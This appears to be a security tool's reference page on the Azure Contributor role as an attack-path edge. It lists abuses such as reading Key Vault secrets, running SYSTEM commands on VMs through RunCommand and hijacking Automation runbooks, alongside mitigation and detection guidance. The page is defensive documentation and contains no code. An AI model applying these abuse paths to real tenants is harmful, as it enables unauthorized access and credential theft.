AZ_CONTRIBUTOR
Summary
FSProtect ACL Alias
AZ_CONTRIBUTOR
Azure Alias
Contributor (Azure RBAC)
Affected Object Types
Subscriptions, Resource Groups, VMs, Key Vaults, Automation Accounts, and other ARM resources
Exploitation Certainty
Certain
Azure RBAC Role
Contributor (b24988ac-6180-42a0-ab88-20f7382dd24c) — full resource write access, but cannot assign roles
Description
AZ_CONTRIBUTOR represents the Azure Resource Manager Contributor role assignment. The Contributor role grants almost all abusable privileges in all circumstances, with some exceptions:
Full management-plane access to the target resource (create, update, delete).
Cannot assign roles — unlike Owner, the Contributor role does not include
Microsoft.Authorization/roleAssignments/write.Cannot manage access policies on some resources directly, but can often bypass this through other means.
The Contributor role is highly dangerous because it enables direct abuse of many resource types:
Key Vault
Read secrets and alter access policies (grant yourself access to read secrets)
Automation Account
Create/edit runbooks that run as the Automation Account; gather RunAs certificates
Virtual Machine
Run SYSTEM commands on the VM via RunCommand
Web App / Function App
Deploy code, access managed identity tokens
Storage Account
Read/write blobs, tables, queues
Identification
PowerShell (Az Module)
Azure GUI
Open Azure Portal → Subscriptions (or the target resource).
Go to Access control (IAM) → Role assignments.
Filter by Role = Contributor.
Review all principals listed.
Exploitation
The Contributor role grants almost all abusable privileges in all circumstances. Unlike Owner, it cannot assign roles — but it can directly abuse resources at the target scope.
Related Attack Paths:
AZ_EXECUTE_COMMAND — Contributor on VMs can execute commands as SYSTEM via RunCommand.
AZ_KEY_VAULT_CONTRIBUTOR — Contributor on Key Vaults can modify access policies to grant data-plane access.
AZ_GET_SECRETS — After modifying access policies, read Key Vault secrets.
AZ_GET_KEYS — After modifying access policies, read Key Vault keys.
AZ_GET_CERTIFICATES — After modifying access policies, read Key Vault certificates.
AZ_VM_CONTRIBUTOR — Contributor on VMs enables the same VM abuses as VM Contributor.
Mitigation
Minimize Contributor assignments
Go to Azure Portal → target resource → Access control (IAM) → Role assignments.
Filter by Contributor and remove any principal that does not strictly require broad access.
Prefer more specific built-in roles (e.g., Reader, Virtual Machine User Login, Key Vault Secrets User).
Use Privileged Identity Management (PIM) for just-in-time access
Configure eligible (not permanent) assignments for the Contributor role.
Require approval and MFA for activation.
Scope assignments narrowly
Assign Contributor at the resource group or resource level rather than subscription level.
Monitor with Azure Policy
Use Azure Policy to audit and restrict overly broad role assignments.
Detection
Monitor Contributor role assignments and privileged actions in Azure Activity Log.
Go to Azure Portal → Monitor → Activity log.
Filter by Operation name:
Microsoft.Authorization/roleAssignments/write.Alert on:
New Contributor role assignments at subscription scope.
RunCommand executions on VMs.
Access policy changes on Key Vaults.
Runbook creation/modification in Automation Accounts.
References
Last updated
Was this helpful?